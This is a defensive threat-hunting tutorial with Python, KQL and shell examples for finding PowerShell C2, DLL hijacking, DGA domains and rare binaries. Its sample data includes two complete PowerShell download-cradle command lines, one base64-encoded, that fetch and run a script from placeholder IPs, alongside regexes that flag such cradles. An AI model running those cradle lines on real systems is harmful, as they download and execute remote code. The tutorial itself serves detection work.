Threat Hunting


Introduction

Threat hunting is the proactive search for malicious activity that evades existing security controls. Unlike automated detection, hunting is hypothesis-driven and iterative. It assumes that adversaries are already inside the network and seeks to find them before they achieve their objectives.

The Hunting Maturity Model

The Hunting Maturity Model (HMM), proposed by David Bianco, describes an organization's hunting capability across five levels. Each step up assumes more routine data collection and a more repeatable, and eventually automated, analysis process:

* **HMM0 — Initial**: Relies on automated alerting only; little or no routine data collection and no proactive hunting
* **HMM1 — Minimal**: Searches collected data for indicators of compromise (IOCs) taken from threat intelligence feeds
* **HMM2 — Procedural**: Follows data analysis procedures created by others, on a high volume of routinely collected data
* **HMM3 — Innovative**: Creates its own novel data analysis procedures
* **HMM4 — Leading**: Automates the majority of its successful analysis procedures, freeing analysts to develop new ones


Hypothesis-Driven Hunting

The hypothesis is the foundation of every hunt. It should be testable, specific, and grounded in threat intelligence or risk assessment.




```python
import re
from dataclasses import dataclass
from typing import Any, Iterator

# Command-line features common to PowerShell download cradles and C2 stagers:
# encoded commands, hidden windows, bypassed execution policy, web downloads.
suspicious_patterns = re.compile(
    r"-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass"
    r"|downloadstring|invoke-webrequest|net\.webclient|\biex\b",
    re.IGNORECASE,
)

@dataclass
class HuntingFinding:
    hypothesis: str
    evidence: Any
    severity: str

# Hypothesis: An adversary is using PowerShell for C2 communication
# Test: Find PowerShell processes making outbound connections
def hunt_powershell_c2(time_window_hours=72) -> Iterator[HuntingFinding]:
    hours = int(time_window_hours)  # never interpolate unvalidated input into the query
    query = f"""
        SELECT p.pid, p.command_line, p.start_time,
               u.username, h.dest_ip, h.dest_port
        FROM processes p
        JOIN users u ON p.user_id = u.id
        JOIN network_connections h ON p.pid = h.pid
        WHERE p.name = 'powershell.exe'
          AND h.dest_port IN (80, 443, 8080)
          AND p.start_time > NOW() - INTERVAL '{hours} hours'
          AND p.command_line NOT LIKE '%WindowsPowerShell%'  -- path filter to cut noise; tune to your baseline
    """
    # execute_hunt is the data platform's query helper and is assumed here
    results = execute_hunt(query)

    for row in results:
        # re.search, not re.match: the flags rarely sit at the start of the line
        if suspicious_patterns.search(row.command_line):
            yield HuntingFinding(
                hypothesis="PowerShell C2",
                evidence=row,
                severity="high",
            )
```
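To see the hypothesis tested end to end without a query backend, here is an added example (not code from the original page) that runs the same test over constructed process and connection rows in Python, joins them by pid, and decodes -EncodedCommand arguments before pattern matching, since an encoded cradle contains none of the strings a plain command-line match looks for. The sample rows, the known-good destination list, the port set and the regexes are assumptions for illustration.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

def encode_ps(script: str) -> str:
    """Build a PowerShell -EncodedCommand value (base64 over UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry (not real data): process rows and network rows
# keyed by pid, shaped like the rows the hunt query's join would return.
PROCESSES = [
    {"pid": 4100, "name": "powershell.exe", "username": "svc_backup",
     "command_line": "powershell.exe -NoP -W Hidden -Enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')")},
    {"pid": 4211, "name": "powershell.exe", "username": "jdoe",
     "command_line": r"powershell.exe -File C:\scripts\sync.ps1"},
    {"pid": 4300, "name": "powershell.exe", "username": "admin",
     "command_line": "powershell.exe -nop -w hidden -c \"$c=New-Object Net.WebClient;"
                     "$c.DownloadString('http://203.0.113.9/x')|iex\""},
    {"pid": 5000, "name": "chrome.exe", "username": "jdoe", "command_line": "chrome.exe"},
]
CONNECTIONS = [
    {"pid": 4100, "dest_ip": "203.0.113.7", "dest_port": 80},
    {"pid": 4211, "dest_ip": "10.0.0.20", "dest_port": 443},
    {"pid": 4300, "dest_ip": "203.0.113.9", "dest_port": 8080},
    {"pid": 5000, "dest_ip": "203.0.113.50", "dest_port": 443},
]
KNOWN_GOOD_DESTS = {"10.0.0.20"}  # assumed baseline: internal host that scripts legitimately reach
C2_PORTS = {80, 443, 8080}

# Download-cradle and evasion features, checked on the visible command line
# and on the decoded script so that encoding does not hide them.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|invoke-expression|\biex\b|-nop\b|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# -e, -ec, -enc, -encoded or -encodedcommand followed by a base64 blob
ENC_ARG = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

@dataclass
class Finding:
    pid: int
    username: str
    destination: str
    reasons: List[str]

def hunt_powershell_c2(processes: Iterable[dict], connections: Iterable[dict],
                       known_good=KNOWN_GOOD_DESTS) -> List[Finding]:
    """Test the hypothesis: powershell.exe on a web port with cradle-like arguments."""
    conns_by_pid: Dict[int, List[dict]] = {}
    for c in connections:
        conns_by_pid.setdefault(c["pid"], []).append(c)
    findings: List[Finding] = []
    for p in processes:
        if p["name"].lower() != "powershell.exe":
            continue
        for c in conns_by_pid.get(p["pid"], []):
            if c["dest_port"] not in C2_PORTS or c["dest_ip"] in known_good:
                continue
            decoded = decode_encoded_command(p["command_line"])
            text = p["command_line"] + " " + (decoded or "")
            reasons = sorted({m.group(0).lower() for m in CRADLE.finditer(text)})
            if decoded is not None:
                reasons.insert(0, "encoded command")
            if reasons:  # a bare powershell.exe on 443 is not evidence by itself
                findings.append(Finding(p["pid"], p["username"],
                                        f'{c["dest_ip"]}:{c["dest_port"]}', reasons))
    return findings

if __name__ == "__main__":
    for f in hunt_powershell_c2(PROCESSES, CONNECTIONS):
        print(f)
```

Running it flags pids 4100 and 4300 and leaves the scripted sync job alone; the point of the decode step is that pid 4100's visible command line contains nothing but flags, and only the decoded text reveals the download cradle.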





MITRE ATT&CK Mapping

The MITRE ATT&CK framework provides a common taxonomy for adversary behavior. Mapping each hunt to the technique it tests makes coverage measurable: the techniques no hunt touches are the gaps, and the mapping lets a hunt's results be compared with the detections built for the same technique.




```yaml
hunt:
  name: "DLL Search Order Hijacking"
  technique_id: T1574.001
  tactics:
    - Persistence
    - Privilege Escalation
    - Defense Evasion

  data_sources:
    - Windows Event ID 4688 (Process Creation)
    - Sysmon Event ID 7 (Image Loaded)
    - File creation events in system directories (Sysmon Event ID 11)

  hypothesis: "Adversary places a malicious DLL in the search path before the legitimate application loads it"

  query:
    platform: kql
    # Assumes Sysmon events are parsed into a table named Sysmon with the
    # field names used below; adjust to the schema of your SIEM.
    text: >
      Sysmon
      | where EventID == 7
      | where ImageLoaded contains "\\Temp\\" or ImageLoaded contains "\\Users\\"
      | where ImageLoaded endswith ".dll"
      | join kind=inner (Sysmon | where EventID == 1) on ProcessGuid
```
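An added example, not part of the original page: the same DLL search-order hunt expressed in Python over constructed Sysmon-style events, so the join logic can be run and inspected. It goes beyond the KQL above in two ways a practitioner usually wants before a finding is raised: a DLL loaded from a user-writable path only becomes a finding if its name collides with a DLL that normally lives in System32 or the image is unsigned, and every finding carries the technique ID so hunt output can be rolled up into ATT&CK coverage. The event dicts, field values and the watch list of DLL names are assumptions.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List

TECHNIQUE_ID = "T1574.001"  # DLL Search Order Hijacking

# Constructed Sysmon-style events (not real telemetry). EventID 1 = process
# creation, EventID 7 = image load; ProcessGuid is the join key between them.
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Users\jdoe\Downloads\setup.exe", "User": "CORP\\jdoe"},
    {"EventID": 7, "ProcessGuid": "{A1}", "ImageLoaded": r"C:\Users\jdoe\Downloads\version.dll", "Signed": "false"},
    {"EventID": 7, "ProcessGuid": "{A1}", "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\Vendor\app.exe", "User": "CORP\\svc_app"},
    {"EventID": 7, "ProcessGuid": "{B2}", "ImageLoaded": r"C:\Users\Public\Temp\cryptbase.dll", "Signed": "false"},
    {"EventID": 1, "ProcessGuid": "{C3}", "Image": r"C:\Program Files\Vendor\tool.exe", "User": "CORP\\jdoe"},
    {"EventID": 7, "ProcessGuid": "{C3}", "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Vendor\helper.dll", "Signed": "true"},
    # an image load whose process-creation event fell outside the collected window
    {"EventID": 7, "ProcessGuid": "{D4}", "ImageLoaded": r"C:\Users\Public\dwmapi.dll", "Signed": "false"},
]

# DLL names that normally live in System32 and are well-known hijack targets;
# an assumed watch list, to be extended from an inventory of your own System32.
SYSTEM_DLL_NAMES = {"version.dll", "cryptbase.dll", "dwmapi.dll", "uxtheme.dll", "wininet.dll"}
USER_WRITABLE = ("\\users\\", "\\temp\\")  # the same path filter as the KQL hunt

@dataclass
class Finding:
    technique_id: str
    process_guid: str
    image: str
    user: str
    dll: str
    reasons: List[str]

def hunt_dll_hijack(events: List[dict]) -> List[Finding]:
    """Join EID 7 loads to their EID 1 process and keep the ones worth triage."""
    # index process-creation events by ProcessGuid: the "join kind=inner" step
    procs: Dict[str, dict] = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings: List[Finding] = []
    for e in events:
        if e["EventID"] != 7:
            continue
        path = e["ImageLoaded"].lower()
        if not path.endswith(".dll") or not any(d in path for d in USER_WRITABLE):
            continue
        proc = procs.get(e["ProcessGuid"])
        if proc is None:
            # inner-join semantics: no EID 1 in the window means the load is dropped.
            # Widen the window or use a left join if this happens often.
            continue
        reasons = ["loaded from user-writable path"]
        name = ntpath.basename(path)
        if name in SYSTEM_DLL_NAMES:
            reasons.append(f"{name} shadows a System32 DLL")
        if e.get("Signed", "").lower() != "true":
            reasons.append("unsigned image")
        if len(reasons) > 1:  # path alone is noisy: require a second indicator
            findings.append(Finding(TECHNIQUE_ID, e["ProcessGuid"], proc["Image"],
                                    proc["User"], e["ImageLoaded"], reasons))
    return findings

if __name__ == "__main__":
    for f in hunt_dll_hijack(EVENTS):
        print(f.technique_id, f.process_guid, f.image, "->", f.dll, f.reasons)
```

The vendor helper DLL under AppData is signed and not a System32 name, so it drops out, and the dwmapi.dll load with no matching process event is silently lost by the inner join, which is the caveat to remember when the hunt's time window is narrower than the process lifetime.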





Data Sources for Hunting

Effective hunting requires rich telemetry. The best sources include:


1. **Process creation logs** (Windows Event ID 4688 / Sysmon Event ID 1)
2. **Network connections** (Sysmon Event ID 3, NetFlow, Zeek conn logs)
3. **DNS queries** (Zeek dns.log, Windows DNS client logs)
4. **File system changes** (Sysmon Event ID 11)
5. **Registry modifications** (Sysmon Event IDs 12-14)
6. **PowerShell operational logs** (Event ID 4103 module logging, Event ID 4104 script block logging)

Two configuration details decide how useful these are: Event ID 4688 carries the command line only when "Include command line in process creation events" is enabled in audit policy, and 4104 records script blocks only when Script Block Logging is turned on, so verify the policy before building a hunt that depends on those fields.


Hunting Tools




```bash
# Velociraptor: collect scheduled tasks from one endpoint as JSON
# (fleet-wide collection is launched as a hunt from the server, not from this CLI)
velociraptor --config client.config.yaml \
  artifacts collect Windows.System.TaskScheduler \
  --format json > scheduled_tasks.json

# Zeek: surface long DNS labels that may indicate a DGA
# (the dns.log column is "query"; drop unset values and reverse lookups)
zeek-cut query < dns.log | \
  grep -v -e '^-$' -e '\.in-addr\.arpa$' | \
  awk '{len=length($1)} len>20 {print $1, len}' | \
  sort | uniq -c | sort -rn | head -20
```

```kql
// KQL: hunting in Microsoft 365 Defender for PsExec run with -s (execute as SYSTEM)
DeviceProcessEvents
| where Timestamp > ago(7d)
// "has" matches the term; "==" would require the whole product name to be exactly "PsExec"
| where ProcessVersionInfoProductName has "PsExec"
// match -s as a standalone switch rather than any "-s" substring
| where ProcessCommandLine matches regex @"(^|\s)-s(\s|$)"
| summarize arg_max(Timestamp, *) by DeviceName
| project DeviceName, AccountName, ProcessCommandLine, Timestamp
```
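The uniq -c pipeline above counts repeated queries, but a DGA rarely asks for the same name twice, so generated names never rise to the top of that list. As an added example (not from the original page), the following Python reads a constructed Zeek dns.log excerpt by its #fields header, scores the registered label of each query by length and Shannon entropy, and stacks the suspicious labels by the querying client, which is where a DGA actually shows up. The log lines, the thresholds and the single-label-TLD simplification in registered_label are illustrative assumptions.

```python
import math
from collections import Counter, defaultdict
from typing import Dict, List

# Constructed Zeek dns.log excerpt (not real traffic). Zeek logs are tab-separated
# and name their columns in a "#fields" header; only a subset of fields is shown.
DNS_LOG = """\
#fields\tts\tid.orig_h\tid.resp_h\tquery\tqtype_name
1700000000.100\t10.0.0.5\t10.0.0.2\twww.example.com\tA
1700000000.200\t10.0.0.5\t10.0.0.2\txk3j9qf7pz2lwm.com\tA
1700000000.300\t10.0.0.5\t10.0.0.2\tq8v2nzp0tk4ryd1s.net\tA
1700000000.400\t10.0.0.5\t10.0.0.2\thb7mc4xlzq9w.org\tA
1700000000.500\t10.0.0.7\t10.0.0.2\tenterpriseupdates.net\tA
1700000000.600\t10.0.0.7\t10.0.0.2\t5.0.0.10.in-addr.arpa\tPTR
1700000000.700\t10.0.0.7\t10.0.0.2\t-\tA
"""

def parse_zeek_log(text: str) -> List[Dict[str, str]]:
    """Parse Zeek's TSV format, taking column names from the #fields header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line:
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random-looking labels score high."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def registered_label(query: str):
    """Second-level label of a query, or None for unset values and reverse lookups.
    Assumption: single-label TLDs; use the public suffix list for co.uk-style names."""
    q = query.rstrip(".").lower()
    if q == "-" or q.endswith(".in-addr.arpa") or q.endswith(".ip6.arpa"):
        return None
    labels = q.split(".")
    return labels[-2] if len(labels) >= 2 else None

def dga_suspects(log_text: str, min_len: int = 12, min_entropy: float = 3.5) -> Dict[str, List[str]]:
    """Stack long, high-entropy labels by the client that queried them."""
    suspects = defaultdict(set)
    for row in parse_zeek_log(log_text):
        label = registered_label(row["query"])
        if label and len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            suspects[row["id.orig_h"]].add(label)
    return {host: sorted(labels) for host, labels in suspects.items()}

if __name__ == "__main__":
    for host, labels in dga_suspects(DNS_LOG).items():
        print(host, len(labels), labels)
```

Only 10.0.0.5 is reported, with its three random-looking labels; the long but ordinary enterpriseupdates label from 10.0.0.7 scores well under the entropy threshold, which is why length alone, as in the awk filter, is not enough.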





Data Analysis Techniques




```python
from collections import Counter
from dataclasses import dataclass

@dataclass
class Anomaly:
    field: str
    value: object
    ratio: float
    baseline: float

# Expected share of each (field, value) pair, learned from a historical baseline
# period; anything absent from the baseline falls back to the default ratio.
expected_ratio = {}

# Stack counting for anomaly detection
def stack_count(events, field, top_n=10, multiplier=3.0, default_ratio=0.01):
    """Identify values of `field` that are unusually frequent versus the baseline."""
    counts = Counter(getattr(e, field) for e in events)
    total = sum(counts.values())
    for value, count in counts.most_common(top_n):
        ratio = count / total
        baseline = expected_ratio.get((field, value), default_ratio)
        if ratio > baseline * multiplier:  # 3x expected baseline by default
            yield Anomaly(field, value, ratio, baseline)
```
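stack_count above reads the top of the stack. In practice the bottom is often the more productive end: a binary that runs on one host out of twenty is what an analyst wants to see, and an image path that appears under two different hashes is a classic masquerade. The following added example (not code from the original page) builds both views over constructed fleet process events; the hosts, paths and hash values are invented.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str    # executable path, normalized to lower case
    sha256: str   # hash from Sysmon EID 1 or EDR telemetry

# Constructed fleet telemetry (not real data): the same binaries on every host,
# plus one that exists on a single host under a system-looking path.
def sample_events() -> List[ProcEvent]:
    hosts = [f"ws{i:02d}" for i in range(1, 21)]  # 20 workstations
    events: List[ProcEvent] = []
    for h in hosts:
        events.append(ProcEvent(h, r"c:\windows\system32\svchost.exe", "aaa111"))
        events.append(ProcEvent(h, r"c:\windows\explorer.exe", "bbb222"))
        events.append(ProcEvent(h, r"c:\program files\vendor\agent.exe", "ccc333"))
    # same path as the real svchost.exe but a different hash, on one host only
    events.append(ProcEvent("ws07", r"c:\windows\system32\svchost.exe", "ddd444"))
    # an admin tool on two hosts: rare but plausible, left for the analyst to judge
    events.append(ProcEvent("ws03", r"c:\tools\procexp64.exe", "eee555"))
    events.append(ProcEvent("ws14", r"c:\tools\procexp64.exe", "eee555"))
    return events

def least_frequent(events: Iterable[ProcEvent], max_hosts: int = 2):
    """Stack (image, hash) pairs by the number of distinct hosts they run on and
    return the rare end of the stack: pairs seen on at most max_hosts hosts."""
    hosts_by_key: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for e in events:
        hosts_by_key[(e.image, e.sha256)].add(e.host)
    rare = [(key, sorted(hosts)) for key, hosts in hosts_by_key.items() if len(hosts) <= max_hosts]
    return sorted(rare, key=lambda kv: (len(kv[1]), kv[0]))

def hash_collisions(events: Iterable[ProcEvent]) -> Dict[str, List[str]]:
    """Image paths seen with more than one hash: a replaced or masqueraded binary."""
    hashes_by_image: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        hashes_by_image[e.image].add(e.sha256)
    return {img: sorted(h) for img, h in hashes_by_image.items() if len(h) > 1}

if __name__ == "__main__":
    evs = sample_events()
    for (image, sha), hosts in least_frequent(evs):
        print(len(hosts), image, sha, hosts)
    print(hash_collisions(evs))
```

Counting distinct hosts rather than raw events matters: a chatty process on one machine can generate thousands of events and still be rare across the fleet, and that is the axis along which an implant stands out.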





Conclusion

Threat hunting transforms security operations from reactive to proactive. Start with structured hypotheses based on threat intelligence, map hunts to MITRE ATT&CK techniques, ensure comprehensive data collection, and iterate based on findings. Mature hunting programs progressively automate successful hunt patterns into detection rules.